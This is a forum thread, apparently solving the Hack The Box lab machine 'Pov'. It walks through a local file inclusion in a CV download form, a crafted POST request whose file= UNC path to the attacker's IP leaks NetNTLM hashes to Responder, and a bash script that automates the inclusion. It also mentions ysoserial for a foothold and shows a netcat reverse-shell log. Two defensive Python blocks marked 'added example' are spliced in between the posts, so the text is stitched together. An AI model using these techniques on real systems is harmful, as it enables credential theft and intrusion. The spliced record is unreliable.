Posts: 11
Threads: 0
Joined: Jan 2024
(Jan 27, 2024, 07:24 PM)DataNinja Wrote: (Jan 27, 2024, 07:21 PM)peRd1 Wrote: (Jan 27, 2024, 07:17 PM)DataNinja Wrote: sfitz::POV:8ddcbc4990a229f...
nice1 how?
LFI
http://dev.pov.htb/portfolio/
Click on the "Download CV" button
Intercepting and renaming the file to default.aspx will give you the following code
use responder on the lfi gets a net ntlm
I'm not able to intercept the hash using responder on the LFI, can you please provide a bit more. Thanks in advance!
Posts: 17
Threads: 1
Joined: Aug 2023
(Jan 27, 2024, 07:48 PM)nonimon Wrote: (Jan 27, 2024, 07:24 PM)DataNinja Wrote: (Jan 27, 2024, 07:21 PM)peRd1 Wrote: (Jan 27, 2024, 07:17 PM)DataNinja Wrote: sfitz::POV:8ddcbc4990a229f...
nice1 how?
LFI
http://dev.pov.htb/portfolio/
Click on the "Download CV" button
Intercepting and renaming the file to default.aspx will give you the following code
use responder on the lfi gets a net ntlm
I'm not able to intercept the hash using responder on the LFI, can you please provide a bit more. Thanks in advance!
Activate responder on your machine and put your own address in the file field.
Posts: 98
Threads: 3
Joined: Oct 2023
is anyone able to pull any files, other than index.aspx.cs?
Posts: 14
Threads: 0
Joined: Jan 2024
(Jan 27, 2024, 07:24 PM)DataNinja Wrote: (Jan 27, 2024, 07:21 PM)peRd1 Wrote: (Jan 27, 2024, 07:17 PM)DataNinja Wrote: sfitz::POV:8ddcbc4990a229f...
nice1 how?
LFI
http://dev.pov.htb/portfolio/
Click on the "Download CV" button
Intercepting and renaming the file to default.aspx will give you the following code
use responder on the lfi gets a net ntlm
(Jan 27, 2024, 08:31 PM)VfV Wrote: (Jan 27, 2024, 08:20 PM)n3wdefender Wrote: (Jan 27, 2024, 08:19 PM)VfV Wrote: (Jan 27, 2024, 07:48 PM)nonimon Wrote: (Jan 27, 2024, 07:24 PM)DataNinja Wrote: LFI
http://dev.pov.htb/portfolio/
Click on the "Download CV" button
Intercepting and renaming the file to default.aspx will give you the following code
use responder on the lfi gets a net ntlm
I'm not able to intercept the hash using responder on the LFI, can you please provide a bit more. Thanks in advance!
me neither
this may help you.
https://medium.com/@ucihamadara/responde...86dad57990
I did
sudo responder -I tun0
And then intercepted on the CV download and put my IP in the "file=" parameter, still getting nothing back
tried 10.10.XX.XX
Just put your IP with \\10.10.XX.XX\
Posts: 6
Threads: 0
Joined: Jan 2024
(Jan 27, 2024, 08:31 PM)VfV Wrote: (Jan 27, 2024, 08:20 PM)n3wdefender Wrote: (Jan 27, 2024, 08:19 PM)VfV Wrote: (Jan 27, 2024, 07:48 PM)nonimon Wrote: (Jan 27, 2024, 07:24 PM)DataNinja Wrote: LFI
http://dev.pov.htb/portfolio/
Click on the "Download CV" button
Intercepting and renaming the file to default.aspx will give you the following code
use responder on the lfi gets a net ntlm
I'm not able to intercept the hash using responder on the LFI, can you please provide a bit more. Thanks in advance!
me neither
this may help you.
https://medium.com/@ucihamadara/responde...86dad57990
I did
sudo responder -I tun0
And then intercepted on the CV download and put my IP in the "file=" parameter, still getting nothing back
tried 10.10.XX.XX
POST /portfolio/ HTTP/1.1
Host: dev.pov.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Origin: http://dev.pov.htb
Connection: keep-alive
Referer: http://dev.pov.htb/portfolio/
Upgrade-Insecure-Requests: 1
Content-Length: 393
__EVENTTARGET=download&__EVENTARGUMENT=&__VIEWSTATE=IF5kZJZ1ideGBDPROTQn3RAv7WlW3XRx0S3DSS2QJ6zR1e8YmJx2aOqs9s9fPXz3uFFYB%2Fvq9cVaLek9aTVSYdbSfl4%3D&__VIEWSTATEGENERATOR=8E0F0FA3&__EVENTVALIDATION=%2BsWUbioJAgHmeHve39BzlYT0Pg13d6FcH1LdNKH2goFApjy8zB6dl%2Fk1yQe5iifNwPGY%2BfYkn%2BgJsL5BJhmK%2Ft%2F%2BwU%2B6iQ%2BPVhgmlhilfD3tb0JjaRfSsCQYXHjmQmqI0E3y4Q%3D%3D&file=%5C%5C10.10.14.26%5Cdefault.aspx
where %5C%5C10.10.14.26%5Cdefault.aspx == \\10.10.14.26\default.aspx ...
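The defensive counterpart to the request above, as an added example that is not code from dev.pov.htb or from any poster: the allowlist check a download handler should apply to the file= value, plus a detection rule run over a constructed POST body (the allowed file name, placeholder ViewState and sample body are assumptions).

```python
"""Input validation and detection for the file= download parameter.
Added example; the allowlist name and SAMPLE_BODY are constructed."""
import re
from urllib.parse import parse_qs, unquote

ALLOWED_DOWNLOADS = {"cv.pdf"}          # assumption: the only legitimate file
SAFE_NAME = re.compile(r"^[A-Za-z0-9_-]+\.[A-Za-z0-9]+$")

def validate_download_name(name: str) -> bool:
    """Allowlist check a download handler should apply before opening anything."""
    name = unquote(name)                # judge the decoded characters, not %5C
    # Reject UNC paths (\\host\share, which make the server authenticate
    # outbound), traversal, absolute paths and drive letters in one go.
    if any(bad in name for bad in ("\\", "/", "..", ":")):
        return False
    return bool(SAFE_NAME.fullmatch(name)) and name in ALLOWED_DOWNLOADS

# Patterns worth an alert in a WAF or log rule on POST /portfolio/ bodies.
SUSPICIOUS = re.compile(r"(\\\\|%5c%5c|\.\.[/\\]|%2e%2e|web\.config|\.cs$)", re.I)

def flag_request(body: str) -> list:
    """Return reasons a form body looks like LFI/UNC abuse (empty if clean)."""
    params = parse_qs(body, keep_blank_values=True)   # decodes %5C etc.
    reasons = []
    for value in params.get("file", []):
        if SUSPICIOUS.search(value):
            reasons.append(f"suspicious file= value: {value}")
        elif not validate_download_name(value):
            reasons.append(f"file= outside allowlist: {value}")
    return reasons

# Constructed sample body with a UNC path in file=, shaped like the captured request.
SAMPLE_BODY = ("__EVENTTARGET=download&__EVENTARGUMENT=&__VIEWSTATE=PLACEHOLDER"
               "&file=%5C%5C10.10.14.26%5Cdefault.aspx")

if __name__ == "__main__":
    for reason in flag_request(SAMPLE_BODY):
        print("ALERT:", reason)
```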
Posts: 55
Threads: 2
Joined: Jul 2023
to automate the lfi
#!/bin/bash
lfi() {
    local path="$1"
    local url="http://dev.pov.htb/portfolio/"
    local data="__EVENTTARGET=download&__EVENTARGUMENT=&__VIEWSTATE=oZdOFgVMnMUK%2FYsKb5EIbu8K5FHpcUxxiZo4DRwjqKXyaBZlr5C2B1qTDis2i3ay5jRdEkHIpxK%2FDtizrUyeFYsgG2I%3D&__VIEWSTATEGENERATOR=8E0F0FA3&__EVENTVALIDATION=q9%2BtrU8Llel1HIV8dNCMQjWweRAVxWvJLVMAhov2wealiJz5v86vse9faPve%2B2Ujm%2BGxnHiSCVy56Gzrmw%2BEzjrEGa%2BQ6qlezJahDpD%2BDppQ%2BivmcgEiaonMs2JLzDyETmEABw%3D%3D&file=$path"
    #echo -e $data
    if response=$(curl -s -k -X POST --data-binary "$data" "$url"); then
        if [ "$(echo "$response" | grep -c "Error 404: Not Found")" -eq 0 ]; then
            echo -e "\e[32m$response\e[0m"
        else
            echo -e "\e[31m$path not found.\e[0m"
        fi
    else
        # curl itself failed: re-issue the same request and report only the HTTP status
        echo -e "\e[31mLFI Error : $(curl -s -k -X POST --data-binary "$data" "$url" -o /dev/null -w '%{http_code}')\e[0m"
    fi
}
main() {
    while true; do
        read -r -p $'\e[34m[+] file >> \e[0m' path
        lfi "$path"
    done
}
if [ "${BASH_SOURCE[0]}" == "${0}" ]; then
    main
fi
Posts: 45
Threads: 1
Joined: Jan 2024
anyone cracked the hash yet?
Posts: 9
Threads: 0
Joined: Jan 2024
(Jan 27, 2024, 07:42 PM)peRd1 Wrote: LFI on cv download endpoint...
Complete newb here, would you be willing to explain this a bit more?
Appreciate it.
Posts: 134
Threads: 13
Joined: Sep 2023
ysoserial after you grab webconfig will get you foothold
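A config audit for the ViewState foothold mentioned above, as an added example that is not code from the thread or the box: it parses a constructed web.config (the box's real file is not on this page; the key values are placeholders) and reports the two settings that make a leaked config directly usable for signing forged ViewState, a static machineKey and MAC checking turned off.

```python
"""Flag web.config settings relevant to ViewState deserialization.
Added example; SAMPLE_WEB_CONFIG and SAFE_WEB_CONFIG are constructed."""
import xml.etree.ElementTree as ET

# Constructed: static keys in the file, MAC disabled.  Keys are placeholders.
SAMPLE_WEB_CONFIG = """<?xml version="1.0"?>
<configuration>
  <system.web>
    <pages enableViewStateMac="false" />
    <machineKey decryption="AES" decryptionKey="PLACEHOLDER_DECRYPTION_KEY"
                validation="SHA1" validationKey="PLACEHOLDER_VALIDATION_KEY" />
  </system.web>
</configuration>"""

# Constructed: keys auto-generated per app, so reading the file yields nothing to sign with.
SAFE_WEB_CONFIG = """<configuration><system.web>
  <pages enableViewStateMac="true" />
  <machineKey validationKey="AutoGenerate,IsolateApps" decryptionKey="AutoGenerate,IsolateApps" />
</system.web></configuration>"""

def viewstate_findings(config_xml: str) -> list:
    """Return a list of findings; empty means nothing in this file helps an attacker."""
    root = ET.fromstring(config_xml)
    findings = []
    pages = root.find("./system.web/pages")
    if pages is not None and pages.get("enableViewStateMac", "true").lower() == "false":
        # Ignored by .NET 4.5.2+, which always enforces the MAC, but still a red flag.
        findings.append("enableViewStateMac=false")
    mk = root.find("./system.web/machineKey")
    if mk is not None:
        for attr in ("validationKey", "decryptionKey"):
            # A literal key here means whoever reads web.config can produce valid MACs.
            if not mk.get(attr, "AutoGenerate").startswith("AutoGenerate"):
                findings.append(f"static {attr}")
    return findings

if __name__ == "__main__":
    print(viewstate_findings(SAMPLE_WEB_CONFIG))
    print(viewstate_findings(SAFE_WEB_CONFIG))
```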
Posts: 12
Threads: 0
Joined: Aug 2023
nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.14.58] from (UNKNOWN) [10.129.125.228] 49674
Windows PowerShell running as user POV$ on POV
Copyright © 2015 Microsoft Corporation. All rights reserved.
PS C:\windows\system32\inetsrv>whoami
pov\sfitz
PS C:\windows\system32\inetsrv> hostname
pov
PS C:\windows\system32\inetsrv>